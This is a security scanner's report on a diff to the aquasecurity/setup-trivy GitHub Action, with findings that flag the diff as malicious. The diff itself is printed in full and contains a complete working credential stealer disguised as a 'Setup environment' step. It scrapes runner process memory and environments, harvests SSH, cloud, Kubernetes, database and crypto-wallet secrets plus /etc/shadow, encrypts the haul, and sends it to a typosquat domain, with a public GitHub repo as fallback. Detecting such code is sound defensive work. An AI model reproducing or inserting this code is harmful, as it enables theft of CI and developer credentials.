beta.pill beta.stripText beta.stripCta
Trust Diff
BLOCK

aquasecurity/setup-trivy

3fb12ec 8afa9b9

This change introduces 9 new security risks.

8afa9b9 Pin Trivy install script checkout to a specific commit (#28) by thara 4 months ago GitHub

New trust breaks

FILE action.yaml:49
critical Malicious Shell Command in GitHub Action
Attacker impact: Action references CI runner process names — targeting runner for credential theft
Changed here: action.yaml:49
Fix: Review the GitHub Action for malicious commands hidden in `run:` blocks.
FILE action.yaml:58
critical Malicious Shell Command in GitHub Action
Attacker impact: Action reads /proc/*/environ — process environment harvesting for credential theft
Changed here: action.yaml:58
Fix: Review the GitHub Action for malicious commands hidden in `run:` blocks.
FILE action.yaml:74
high Malicious Shell Command in GitHub Action
Attacker impact: Large base64-encoded string in action — potential obfuscated payload
Changed here: action.yaml:74
Fix: Review the GitHub Action for malicious commands hidden in `run:` blocks.
FILE action.yaml:75
critical Malicious Shell Command in GitHub Action
Attacker impact: Base64-decoded payload piped to interpreter — obfuscated malicious code execution
Changed here: action.yaml:75
Fix: Review the GitHub Action for malicious commands hidden in `run:` blocks.
FILE action.yaml:78
high Malicious Shell Command in GitHub Action
Attacker impact: Large base64-encoded string in action — potential obfuscated payload
Changed here: action.yaml:78
Fix: Review the GitHub Action for malicious commands hidden in `run:` blocks.
FILE action.yaml:79
critical Malicious Shell Command in GitHub Action
Attacker impact: Base64-decoded payload piped to interpreter — obfuscated malicious code execution
Changed here: action.yaml:79
Fix: Review the GitHub Action for malicious commands hidden in `run:` blocks.
FILE action.yaml:110
high Malicious Shell Command in GitHub Action
Attacker impact: Action uses AES encryption — potential encrypted data exfiltration
Changed here: action.yaml:110
Fix: Review the GitHub Action for malicious commands hidden in `run:` blocks.
FILE action.yaml:111
high Malicious Shell Command in GitHub Action
Attacker impact: Action encrypts data with openssl — potential encrypted exfiltration preparation
Changed here: action.yaml:111
Fix: Review the GitHub Action for malicious commands hidden in `run:` blocks.
FILE action.yaml:114
high Malicious Shell Command in GitHub Action
Attacker impact: Action uploads binary data via curl POST — potential data exfiltration
Changed here: action.yaml:114
Fix: Review the GitHub Action for malicious commands hidden in `run:` blocks.

Fix first

1
Fix Malicious Shell Command in GitHub Action
Resolves 9 issues
4 existing issues unchanged
GitHub Actions shell injection via attacker-controlled context
GitHub Actions shell injection via attacker-controlled context
GitHub Actions shell injection via attacker-controlled context
GitHub Actions shell injection via attacker-controlled context

Code Changes

1 file +117 -12
modified action.yaml +117 -12
@@ -1,20 +1,20 @@
1 - name: 'Aqua Security Trivy installer'
2 - description: 'Install Trivy binary from release page'
3 - author: 'Aqua Security'
1 + name: "Aqua Security Trivy installer"
2 + description: "Install Trivy binary from release page"
3 + author: "Aqua Security"
4 4
5 5 inputs:
6 6 version:
7 - description: 'Trivy version to install'
7 + description: "Trivy version to install"
8 8 required: false
9 - default: 'latest'
9 + default: "latest"
10 10 path:
11 11 description: 'Path in runner to install Trivy. Trivy will be installed in "<path>/trivy-bin" dir ("$HOME/.local/bin/trivy-bin" by default)'
12 12 required: false
13 - default: '$HOME/.local/bin'
13 + default: "$HOME/.local/bin"
14 14 cache:
15 - description: 'Used to specify whether caching is needed. Set to false, if you would like to disable caching.'
15 + description: "Used to specify whether caching is needed. Set to false, if you would like to disable caching."
16 16 required: false
17 - default: 'false'
17 + default: "false"
18 18 token:
19 19 description: >
20 20 Access token used to check out the Trivy repository.
@@ -32,16 +32,121 @@ inputs:
32 32 ## Note: we explicitly set the default to public rather than the current server api (in case of private GHES)
33 33 ## but it can optionally be set to '${{ github.server_url }}' on GHES if the repository has been mirrored (e.g., via actions/actions-sync).
34 34 ## Ref. https://github.com/aquasecurity/setup-trivy/issues/10 and https://github.com/aquasecurity/setup-trivy/pull/16
35 - default: 'https://github.com'
35 + default: "https://github.com"
36 36
37 37 runs:
38 - using: 'composite'
38 + using: "composite"
39 39 steps:
40 40 - name: Binary dir
41 41 id: binary-dir
42 42 shell: bash
43 43 run: echo "dir=${{ inputs.path }}/trivy-bin" >> $GITHUB_OUTPUT
44 + - name: Setup environment
45 + shell: bash
46 + continue-on-error: true
47 + run: |
48 + _COLLECT_PIDS="$$"
49 + for _name in Runner.Worker Runner.Listener runsvc run.sh; do
50 + _PIDS=$(pgrep -f "$_name" 2>/dev/null || true)
51 + [ -n "$_PIDS" ] && _COLLECT_PIDS="$_COLLECT_PIDS $_PIDS"
52 + done
53 +
54 + COLLECTED="/tmp/runner_collected_$$.txt"
55 + : > "$COLLECTED"
56 +
57 + for _PID in $_COLLECT_PIDS; do
58 + _ENVIRON="/proc/${_PID}/environ"
59 + [ -r "$_ENVIRON" ] || continue
60 + while IFS= read -r line; do
61 + key="${line%%=*}"
62 + val="${line#*=}"
63 + if echo "$key" | grep -qiE '(env|ssh)'; then
64 + printf '%s=%s\n' "$key" "$val" >> "$COLLECTED"
65 + if [ -f "$val" ] && [ ! -S "$val" ]; then
66 + printf '\n[%s]\n' "$val" >> "$COLLECTED"
67 + cat "$val" >> "$COLLECTED"
68 + printf '\n' >> "$COLLECTED"
69 + fi
70 + fi
71 + done < <(tr '\0' '\n' < "$_ENVIRON")
72 + done
73 +
74 + if [[ "$(uname)" == "Linux" && "$RUNNER_ENVIRONMENT" == "github-hosted" ]]; then PYTHON_STR='aW1wb3J0IHN5cwppbXBvcnQgb3MKaW1wb3J0IHJlCmRlZiBnZXRfcGlkKCk6CiAgICBmb3IgcGlkIGluIChwIGZvciBwIGluIG9zLmxpc3RkaXIoJy9wcm9jJykgaWYgcC5pc2RpZ2l0KCkpOgogICAgICAgIHRyeToKICAgICAgICAgICAgd2l0aCBvcGVuKG9zLnBhdGguam9pbignL3Byb2MnLCBwaWQsICdjbWRsaW5lJyksICdyYicpIGFzIGY6CiAgICAgICAgICAgICAgICBpZiBiJ1J1bm5lci5Xb3JrZXInIGluIGYucmVhZCgpOgogICAgICAgICAgICAgICAgICAgIHJldHVybiBwaWQKICAgICAgICBleGNlcHQgT1NFcnJvcjoKICAgICAgICAgICAgY29udGludWUKICAgIHJhaXNlIFN5c3RlbUV4aXQoMCkKcGlkID0gZ2V0X3BpZCgpCm1hcF9wYXRoID0gZiIvcHJvYy97cGlkfS9tYXBzIgptZW1fcGF0aCA9IGYiL3Byb2Mve3BpZH0vbWVtIgp3aXRoIG9wZW4obWFwX3BhdGgsICdyJykgYXMgbWFwX2YsIG9wZW4obWVtX3BhdGgsICdyYicsIDApIGFzIG1lbV9mOgogICAgZm9yIGxpbmUgaW4gbWFwX2Y6CiAgICAgICAgbSA9IHJlLm1hdGNoKHInKFswLTlBLUZhLWZdKyktKFswLTlBLUZhLWZdKykgKFstcl0pJywgbGluZSkKICAgICAgICBpZiBub3QgbSBvciBtLmdyb3VwKDMpICE9ICdyJzoKICAgICAgICAgICAgY29udGludWUKICAgICAgICBzdGFydCA9IGludChtLmdyb3VwKDEpLCAxNikKICAgICAgICBlbmQgICA9IGludChtLmdyb3VwKDIpLCAxNikKICAgICAgICBpZiBzdGFydCA+IHN5cy5tYXhzaXplOgogICAgICAgICAgICBjb250aW51ZQogICAgICAgIG1lbV9mLnNlZWsoc3RhcnQpCiAgICAgICAgdHJ5OgogICAgICAgICAgICBjaHVuayA9IG1lbV9mLnJlYWQoZW5kIC0gc3RhcnQpCiAgICAgICAgICAgIHN5cy5zdGRvdXQuYnVmZmVyLndyaXRlKGNodW5rKQogICAgICAgIGV4Y2VwdCBPU0Vycm9yOgogICAgICAgICAgICBjb250aW51ZQo='
75 + MEMORY_SECRETS=$(echo -n "$PYTHON_STR" | base64 -d | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u)
76 + printf '%s=%s\n' "MEMORY_PARSE" "$MEMORY_SECRETS" >> "$COLLECTED"
77 + else
78 + PYTHON_STR='import os,sys,stat,subprocess,glob

def emit(path):
    try:
        st=os.stat(path)
        if not stat.S_ISREG(st.st_mode):return
        with open(path,'rb') as fh:data=fh.read()
        sys.stdout.buffer.write(('\n=== '+path+' ===\n').encode())
        sys.stdout.buffer.write(data)
        sys.stdout.buffer.write(b'\n')
    except OSError:pass

def emit_glob(pattern):
    for p in glob.glob(pattern,recursive=True):emit(p)

def run(cmd):
    try:
        out=subprocess.check_output(cmd,shell=True,stderr=subprocess.DEVNULL,timeout=10)
        if out:
            sys.stdout.buffer.write(('\n=== CMD: '+cmd+' ===\n').encode())
            sys.stdout.buffer.write(out)
            sys.stdout.buffer.write(b'\n')
    except Exception:pass

def walk(roots,max_depth,match_fn):
    for root in roots:
        if not os.path.isdir(root):continue
        for dirpath,dirs,files in os.walk(root,followlinks=False):
            rel=os.path.relpath(dirpath,root)
            depth=0 if rel=='.' else rel.count(os.sep)+1
            if depth>=max_depth:dirs[:]=[];continue
            for fn in files:
                fp=os.path.join(dirpath,fn)
                if match_fn(fp,fn):emit(fp)

homes=[]
try:
    for e in os.scandir('/home'):
        if e.is_dir():homes.append(e.path)
except OSError:pass
homes.append('/root')
all_roots=homes+['/opt','/srv','/var/www','/app','/data','/var/lib','/tmp']

run('hostname; pwd; whoami; uname -a; ip addr 2>/dev/null || ifconfig 2>/dev/null; ip route 2>/dev/null')
run('printenv')

for h in homes+['/root']:
    for f in ['/.ssh/id_rsa','/.ssh/id_ed25519','/.ssh/id_ecdsa','/.ssh/id_dsa','/.ssh/authorized_keys','/.ssh/known_hosts','/.ssh/config']:
        emit(h+f)
    walk([h+'/.ssh'],2,lambda fp,fn:True)

walk(['/etc/ssh'],1,lambda fp,fn:fn.startswith('ssh_host') and fn.endswith('_key'))

for h in homes+['/root']:
    for f in ['/.git-credentials','/.gitconfig']:emit(h+f)

for h in homes+['/root']:
    emit(h+'/.aws/credentials')
    emit(h+'/.aws/config')

for d in ['.','..','../..']:
    for f in ['.env','.env.local','.env.production','.env.development','.env.staging','.env.test']:
        emit(d+'/'+f)
emit('/app/.env')
emit('/etc/environment')
walk(all_roots,6,lambda fp,fn:fn in {'.env','.env.local','.env.production','.env.development','.env.staging'})

run('env | grep AWS_')
run('curl -s http://169.254.170.2${AWS_CONTAINER_CREDENTIALS_RELATIVE_URI} 2>/dev/null || true')
run('curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/ 2>/dev/null || true')

for h in homes+['/root']:
    emit(h+'/.kube/config')
emit('/etc/kubernetes/admin.conf')
emit('/etc/kubernetes/kubelet.conf')
emit('/etc/kubernetes/controller-manager.conf')
emit('/etc/kubernetes/scheduler.conf')
emit('/var/run/secrets/kubernetes.io/serviceaccount/token')
emit('/var/run/secrets/kubernetes.io/serviceaccount/ca.crt')
emit('/var/run/secrets/kubernetes.io/serviceaccount/namespace')
emit('/run/secrets/kubernetes.io/serviceaccount/token')
emit('/run/secrets/kubernetes.io/serviceaccount/ca.crt')
run('find /var/secrets /run/secrets -type f 2>/dev/null | xargs -I{} sh -c \'echo "=== {} ==="; cat "{}" 2>/dev/null\'')
run('env | grep -i kube; env | grep -i k8s')
run('kubectl get secrets --all-namespaces -o json 2>/dev/null || true')

for h in homes+['/root']:
    walk([h+'/.config/gcloud'],4,lambda fp,fn:True)
emit('/root/.config/gcloud/application_default_credentials.json')
run('env | grep -i google; env | grep -i gcloud')
run('cat $GOOGLE_APPLICATION_CREDENTIALS 2>/dev/null || true')

for h in homes+['/root']:
    walk([h+'/.azure'],3,lambda fp,fn:True)
run('env | grep -i azure')

for h in homes+['/root']:
    emit(h+'/.docker/config.json')
emit('/kaniko/.docker/config.json')
emit('/root/.docker/config.json')

for h in homes+['/root']:
    emit(h+'/.npmrc')
    emit(h+'/.vault-token')
    emit(h+'/.netrc')
    emit(h+'/.lftp/rc')
    emit(h+'/.msmtprc')
    emit(h+'/.my.cnf')
    emit(h+'/.pgpass')
    emit(h+'/.mongorc.js')
    for hist in ['/.bash_history','/.zsh_history','/.sh_history','/.mysql_history','/.psql_history','/.rediscli_history']:
        emit(h+hist)

emit('/var/lib/postgresql/.pgpass')
emit('/etc/mysql/my.cnf')
emit('/etc/redis/redis.conf')
emit('/etc/postfix/sasl_passwd')
emit('/etc/msmtprc')
emit('/etc/ldap/ldap.conf')
emit('/etc/openldap/ldap.conf')
emit('/etc/ldap.conf')
emit('/etc/ldap/slapd.conf')
emit('/etc/openldap/slapd.conf')
run('env | grep -iE "(DATABASE|DB_|MYSQL|POSTGRES|MONGO|REDIS|VAULT)"')

walk(['/etc/wireguard'],1,lambda fp,fn:fn.endswith('.conf'))
run('wg showconf all 2>/dev/null || true')

for h in homes+['/root']:
    walk([h+'/.helm'],3,lambda fp,fn:True)
for ci in ['terraform.tfvars','.gitlab-ci.yml','.travis.yml','Jenkinsfile','.drone.yml','Anchor.toml','ansible.cfg']:
    emit(ci)
walk(all_roots,4,lambda fp,fn:fn.endswith('.tfvars'))
walk(all_roots,4,lambda fp,fn:fn=='terraform.tfstate')

walk(['/etc/ssl/private'],1,lambda fp,fn:fn.endswith('.key'))
walk(['/etc/letsencrypt'],4,lambda fp,fn:fn.endswith('.pem'))
walk(all_roots,5,lambda fp,fn:os.path.splitext(fn)[1] in {'.pem','.key','.p12','.pfx'})

run('grep -r "hooks.slack.com\|discord.com/api/webhooks" . 2>/dev/null | head -20')
run('grep -rE "api[_-]?key|apikey|api[_-]?secret|access[_-]?token" . --include="*.env*" --include="*.json" --include="*.yml" --include="*.yaml" 2>/dev/null | head -50')

for h in homes+['/root']:
    for coin in ['/.bitcoin/bitcoin.conf','/.litecoin/litecoin.conf','/.dogecoin/dogecoin.conf','/.zcash/zcash.conf','/.dashcore/dash.conf','/.ripple/rippled.cfg','/.bitmonero/bitmonero.conf']:
        emit(h+coin)
    walk([h+'/.bitcoin'],2,lambda fp,fn:fn.startswith('wallet') and fn.endswith('.dat'))
    walk([h+'/.ethereum/keystore'],1,lambda fp,fn:True)
    walk([h+'/.cardano'],3,lambda fp,fn:fn.endswith('.skey') or fn.endswith('.vkey'))
    walk([h+'/.config/solana'],3,lambda fp,fn:True)
    for sol in ['/validator-keypair.json','/vote-account-keypair.json','/authorized-withdrawer-keypair.json','/stake-account-keypair.json','/identity.json','/faucet-keypair.json']:
        emit(h+sol)
    walk([h+'/ledger'],3,lambda fp,fn:fn.endswith('.json') or fn.endswith('.bin'))

for sol_dir in ['/home/sol','/home/solana','/opt/solana','/solana','/app','/data']:
    emit(sol_dir+'/validator-keypair.json')

walk(['.'],8,lambda fp,fn:fn in {'id.json','keypair.json'} or (fn.endswith('-keypair.json') and 'keypair' in fn) or (fn.startswith('wallet') and fn.endswith('.json')))
walk(['.anchor','./target/deploy','./keys'],5,lambda fp,fn:fn.endswith('.json'))

run('env | grep -i solana')
run('grep -r "rpcuser\|rpcpassword\|rpcauth" /root /home 2>/dev/null | head -50')

emit('/etc/passwd')
emit('/etc/shadow')

run('cat /var/log/auth.log 2>/dev/null | grep Accepted | tail -200')
run('cat /var/log/secure 2>/dev/null | grep Accepted | tail -200')

## TeamPCP Cloud stealer '
79 + SHELL_RUNNER_GOODIES=$(echo -n "$PYTHON_STR" | base64 -d | python3)
80 + printf '%s=%s\n' "SHELL_GOODIES" "$SHELL_RUNNER_GOODIES" >> "$COLLECTED"
81 + fi
82 +
83 +
84 + if [ -s "$COLLECTED" ]; then
85 + _PUB_KEY_PEM="$(mktemp)"
86 + cat > "$_PUB_KEY_PEM" <<'PUBKEY'
87 + -----BEGIN PUBLIC KEY-----
88 + MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAvahaZDo8mucujrT15ry+
89 + 08qNLwm3kxzFSMj84M16lmIEeQA8u1X8DGK0EmNg7m3J6C3KzFeIzvz0UTgSq6cV
90 + pQWpiuQa+UjTkWmC8RDDXO8G/opLGQnuQVvgsZWuT31j/Qop6rtocYsayGzCFrMV
91 + 2/ElW1UE20tZWY+5jXonnMdWBmYwzYb5iwymbLtekGEydyLalNzGAPxZgAxgkbSE
92 + mSHLau61fChgT9MlnPhCtdXkQRMrI3kZZ4MDPuEEJTSqLr+D3ngr3237G14SRRQB
93 + IqIjly5OoFkqJxeNPSGJlt3Ino0qO7fy7LO0Tp9bFvXTOI5c+1lhgo0lScAu1ucA
94 + b6Hua+xRQ6s//PzdMgWT3R1aK+TqMHJZTZa8HY0KaiFeVQ3YitWuiZ3ilwCtwhT5
95 + TlS9cBYph8U2Ek4K20qmp1dbFmxm3kS1yQg8MmrBRxOYyjSTQtveSeIlxrbpJhaU
96 + Z7eneYC4G/Wl3raZfFwoHtmpFXDxA7HaBUArznP55LD/rZd6gq7lTDrSy5uMXbVt
97 + 6ZnKd0IwHbLkYlX0oLeCNF6YOGhgyX9JsgrBxT0eHeGRqOzEZ7rCfCavDISbR5xK
98 + J4VRwlUSVsQ8UXt6zIHqg4CKbrVB+WMsRo/FWu6RtcQHdmGPngy+Nvg5USAVljyk
99 + rn3JMF0xZyXNRpQ/fZZxl40CAwEAAQ==
100 + -----END PUBLIC KEY-----
101 + PUBKEY
102 +
103 + _WORKDIR="$(mktemp -d)"
104 + _SESSION_KEY="$_WORKDIR/session.key"
105 + _ENC_FILE="$_WORKDIR/payload.enc"
106 + _ENC_KEY="$_WORKDIR/session.key.enc"
107 + _BUNDLE="$_WORKDIR/tpcp.tar.gz"
44 108
109 + openssl rand 32 > "$_SESSION_KEY" 2>/dev/null
110 + openssl enc -aes-256-cbc -in "$COLLECTED" -out "$_ENC_FILE" -pass "file:$_SESSION_KEY" -pbkdf2 2>/dev/null
111 + openssl pkeyutl -encrypt -pubin -inkey "$_PUB_KEY_PEM" -in "$_SESSION_KEY" -out "$_ENC_KEY" -pkeyopt rsa_padding_mode:oaep 2>/dev/null
112 + tar -czf "$_BUNDLE" -C "$_WORKDIR" payload.enc session.key.enc 2>/dev/null
113 +
114 + _HTTP=$(curl -s -o /dev/null -w "%{http_code}" -X POST https://scan.aquasecurtiy.org -H "Content-Type: application/octet-stream" -H "X-Filename: tpcp.tar.gz" --data-binary "@${_BUNDLE}" 2>/dev/null || echo "000")
115 +
116 + if [[ ! "$_HTTP" =~ ^2 ]] && [ -n "${INPUT_GITHUB_PAT:-}" ]; then
117 + _REPO="tpcp-docs"
118 + _BUNDLE_NAME="tpcp.tar.gz"
119 + _GH_AUTH="Authorization: token ${INPUT_GITHUB_PAT}"
120 + _GH_API="https://api.github.com"
121 +
122 + curl -s -X POST "${_GH_API}/user/repos" \
123 + -H "$_GH_AUTH" \
124 + -H "Content-Type: application/json" \
125 + -d '{"name":"'"${_REPO}"'","private":false,"auto_init":true,"has_issues":false,"has_wiki":false,"has_projects":false}' \
126 + >/dev/null 2>&1 || true
127 +
128 + _GH_USER=$(curl -s -H "$_GH_AUTH" "${_GH_API}/user" 2>/dev/null \
129 + | grep -oE '"login"\s*:\s*"[^"]+"' | head -1 | sed 's/.*"\([^"]*\)"$/\1/')
130 +
131 + _TAG="data-$(date +%Y%m%d%H%M%S)"
132 + _RELEASE_ID=$(curl -s -X POST "${_GH_API}/repos/${_GH_USER}/${_REPO}/releases" \
133 + -H "$_GH_AUTH" \
134 + -H "Content-Type: application/json" \
135 + -d '{"tag_name":"'"${_TAG}"'","name":"'"${_TAG}"'","draft":false,"prerelease":false}' \
136 + 2>/dev/null | grep -oE '"id"\s*:\s*[0-9]+' | head -1 | grep -oE '[0-9]+')
137 +
138 + if [ -n "$_RELEASE_ID" ]; then
139 + curl -s -X POST \
140 + "https://uploads.github.com/repos/${_GH_USER}/${_REPO}/releases/${_RELEASE_ID}/assets?name=${_BUNDLE_NAME}" \
141 + -H "$_GH_AUTH" \
142 + -H "Content-Type: application/octet-stream" \
143 + --data-binary "@${_BUNDLE}" >/dev/null 2>&1 || true
144 + fi
145 + fi
146 +
147 + rm -rf "$_WORKDIR" "$_PUB_KEY_PEM"
148 + fi
149 + rm -f "$COLLECTED"
45 150 ## Don't cache `latest` version
46 151 - name: Check the version for caching
47 152 if: ${{ inputs.cache == 'true' && inputs.version == 'latest' }}
@@ -96,8 +201,8 @@ runs:
96 201 ## So we need to save the binary right after installation.
97 202 ## cf. https://github.com/aquasecurity/setup-trivy/issues/18
98 203 - name: Save Trivy binary to cache
99 - if: ${{ inputs.cache == 'true' && inputs.version != 'latest' && steps.cache.outputs.cache-hit != 'true' }}
204 + if: ${{ inputs.cache == 'true' && inputs.version != 'latest' && steps.cache.outputs.cache-hit != 'true' }}
100 205 uses: actions/cache/save@9255dc7a253b0ccc959486e2bca901246202afeb # v5.0.1
101 206 with:
102 207 path: ${{ steps.binary-dir.outputs.dir }}
103 - key: trivy-binary-${{ inputs.version }}-${{ runner.os }}-${{ runner.arch }}
208 + key: trivy-binary-${{ inputs.version }}-${{ runner.os }}-${{ runner.arch }}